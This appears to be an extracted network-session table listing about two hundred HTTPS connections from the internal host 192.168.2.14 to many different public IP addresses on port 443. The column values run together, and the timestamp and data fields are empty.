                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19888192.168.2.144318269.245.7.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19889192.168.2.1435112181.106.125.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19890192.168.2.1456448208.81.10.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19891192.168.2.145843277.195.68.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19892192.168.2.1440082168.165.196.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19893192.168.2.144304694.163.12.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19894192.168.2.1447774165.11.196.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19895192.168.2.1443936177.223.105.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19896192.168.2.1455596126.139.169.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19897192.168.2.146017886.90.113.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19898192.168.2.145289418.246.125.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19899192.168.2.14568249.106.134.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19900192.168.2.1433880223.157.59.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19901192.168.2.1455126207.255.126.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19902192.168.2.1441122218.46.17.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19903192.168.2.145046292.116.190.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19904192.168.2.144988883.171.34.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19905192.168.2.1458724175.134.231.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19906192.168.2.1459064207.76.246.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19907192.168.2.1436548149.209.140.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19908192.168.2.1441102192.7.215.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19909192.168.2.145113460.30.130.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19910192.168.2.1438690211.180.231.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19911192.168.2.1433390123.74.169.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19912192.168.2.143948682.141.101.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19913192.168.2.145275436.13.110.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19914192.168.2.145807892.205.237.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19915192.168.2.1441924191.160.197.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19916192.168.2.144225882.20.148.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19917192.168.2.1445054126.22.15.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19918192.168.2.1454228191.54.72.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19919192.168.2.1438124195.42.63.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19920192.168.2.1452824123.133.36.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19921192.168.2.145794293.229.73.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19922192.168.2.1449650121.215.47.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19923192.168.2.144108624.92.91.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19924192.168.2.145423663.53.93.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19925192.168.2.1458978130.167.188.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19926192.168.2.1444750105.227.138.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19927192.168.2.1440876131.135.115.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19928192.168.2.1444402207.166.66.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19929192.168.2.1440636203.234.215.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19930192.168.2.143444471.223.212.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19931192.168.2.143400414.145.38.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19932192.168.2.1444684174.131.234.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19933192.168.2.143296489.53.237.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19934192.168.2.144699235.15.194.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19935192.168.2.143960470.109.189.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19936192.168.2.145708683.57.129.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19937192.168.2.143542662.222.3.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19938192.168.2.1449746156.23.131.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19939192.168.2.145463431.252.205.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19940192.168.2.145972889.200.194.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19941192.168.2.1440114161.111.83.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19942192.168.2.1453278159.197.6.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19943192.168.2.1453342182.46.160.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19944192.168.2.1441438207.126.222.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19945192.168.2.144914457.231.182.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19946192.168.2.1447282219.68.249.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19947192.168.2.1446144184.82.65.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19948192.168.2.143296623.125.97.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19949192.168.2.143542047.221.198.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19950192.168.2.1452632189.40.166.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19951192.168.2.1436172131.232.170.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19952192.168.2.1457678223.46.178.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19953192.168.2.1440618201.29.48.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19954192.168.2.144532441.64.67.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19955192.168.2.145709495.128.230.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19956192.168.2.1456852198.56.210.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19957192.168.2.1436034122.219.188.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19958192.168.2.1453232200.249.24.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19959192.168.2.1456336131.189.96.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19960192.168.2.145776812.36.89.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19961192.168.2.145048837.173.154.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19962192.168.2.145243682.9.7.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19963192.168.2.144495291.89.1.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19964192.168.2.144476619.166.100.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19965192.168.2.1450230159.22.160.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19966192.168.2.1444548116.238.70.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19967192.168.2.143484853.157.199.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19968192.168.2.1446408162.141.242.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19969192.168.2.1451602211.23.95.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19970192.168.2.1445748148.2.58.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19971192.168.2.1456508216.166.249.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19972192.168.2.143337620.165.110.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19973192.168.2.1447700177.131.57.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19974192.168.2.1440128155.78.232.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19975192.168.2.145566439.108.180.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19976192.168.2.1439944118.232.207.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19977192.168.2.144472663.58.21.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19978192.168.2.144048812.248.125.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19979192.168.2.1442830122.187.171.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19980192.168.2.1451880107.97.108.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19981192.168.2.144142259.227.137.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19982192.168.2.1440096172.198.51.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19983192.168.2.145137424.12.251.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19984192.168.2.1439638102.142.130.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19985192.168.2.1440566201.243.112.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19986192.168.2.1438882202.77.93.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19987192.168.2.145566684.38.41.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19988192.168.2.144844065.108.250.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19989192.168.2.1443352136.157.103.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19990192.168.2.1452678109.28.78.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19991192.168.2.1459908204.218.60.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19992192.168.2.1450318152.81.158.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19993192.168.2.1460714180.197.103.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19994192.168.2.146003436.89.111.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19995192.168.2.1454914178.67.207.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19996192.168.2.145182887.211.1.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19997192.168.2.1458002158.18.3.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19998192.168.2.1443984113.48.106.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19999192.168.2.144676880.203.71.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20000192.168.2.1445528117.245.226.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20001192.168.2.1436422109.77.185.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20002192.168.2.1443672207.62.167.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20003192.168.2.143336485.72.236.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20004192.168.2.1438130134.173.51.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20005192.168.2.1459324131.47.154.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20006192.168.2.1440900150.236.216.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20007192.168.2.143465818.170.178.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20008192.168.2.144276698.138.64.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20009192.168.2.1450540162.179.230.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20010192.168.2.1439826199.150.71.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20011192.168.2.1445210209.84.177.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20012192.168.2.1455398209.243.183.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20013192.168.2.1453626129.242.10.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20014192.168.2.1451772115.13.15.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20015192.168.2.144276070.219.123.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20016192.168.2.143544090.176.78.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20017192.168.2.144814812.53.173.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20018192.168.2.1448606165.111.187.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20019192.168.2.1433922202.125.145.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20020192.168.2.143839860.154.64.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20021192.168.2.1435802199.161.177.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20022192.168.2.144153276.107.154.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20023192.168.2.1436686102.186.11.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20024192.168.2.1453660121.8.248.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20025192.168.2.143629071.29.135.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20026192.168.2.1453696189.253.215.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20027192.168.2.1458236130.195.137.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20028192.168.2.1444438120.184.16.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20029192.168.2.1446942212.31.166.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20030192.168.2.1441004222.218.16.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20031192.168.2.1441026216.231.106.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20032192.168.2.143568267.157.123.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20033192.168.2.1459906144.205.232.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20034192.168.2.1450406131.89.125.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20035192.168.2.145554639.141.173.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20036192.168.2.1437974184.142.183.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20037192.168.2.1435706173.210.67.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20038192.168.2.1452072188.24.149.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20039192.168.2.1446534147.90.102.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20040192.168.2.1451700109.12.68.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20041192.168.2.1444404185.105.21.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20042192.168.2.1455164162.247.45.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20043192.168.2.1437286140.207.238.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20044192.168.2.1433642170.122.166.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20045192.168.2.1439072160.172.184.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20046192.168.2.145688065.161.38.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20047192.168.2.143925872.121.220.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20048192.168.2.1450852141.68.143.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20049192.168.2.1440404206.161.137.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20050192.168.2.1460730184.202.37.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20051192.168.2.145019851.94.48.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20052192.168.2.1445908159.88.32.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20053192.168.2.144098446.140.19.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20054192.168.2.145502457.123.3.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20055192.168.2.1439538101.163.18.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20056192.168.2.144482087.166.129.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20057192.168.2.1444538152.124.241.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20058192.168.2.1444552152.222.95.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20059192.168.2.1448270139.184.229.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20060192.168.2.144859097.157.134.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20061192.168.2.144960647.246.178.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20062192.168.2.1450392197.163.100.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20063192.168.2.1457534188.234.16.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20064192.168.2.14567505.17.192.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20065192.168.2.1442342147.47.175.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20066192.168.2.1456956113.58.119.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20067192.168.2.145088238.254.75.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20068192.168.2.1434314120.188.180.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20069192.168.2.143358424.132.159.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20070192.168.2.144487666.74.4.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20071192.168.2.144711086.212.15.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20072192.168.2.144473818.126.123.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20073192.168.2.145419872.92.250.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20074192.168.2.145561241.40.128.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20075192.168.2.145119259.101.231.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20076192.168.2.144553099.153.47.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20077192.168.2.14339648.147.131.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20078192.168.2.1442878149.164.218.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20079192.168.2.1447830177.115.228.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20080192.168.2.145191665.133.22.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20081192.168.2.144174265.122.205.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20082192.168.2.144558219.175.179.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20083192.168.2.144578245.23.21.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20084192.168.2.143443838.78.57.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20085192.168.2.1441300133.206.228.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20086192.168.2.146036868.71.34.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20087192.168.2.1459520101.5.118.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20088192.168.2.1449656151.77.63.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20089192.168.2.145808893.13.110.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20090192.168.2.143577852.158.25.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20091192.168.2.1439912144.139.236.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20092192.168.2.1442008216.6.96.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20093192.168.2.1460982144.6.237.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20094192.168.2.1444700180.45.171.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20095192.168.2.1456880169.116.15.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20096192.168.2.1449722141.216.107.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20097192.168.2.1459024193.40.171.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20098192.168.2.1455082221.94.212.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20099192.168.2.1433288190.185.217.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
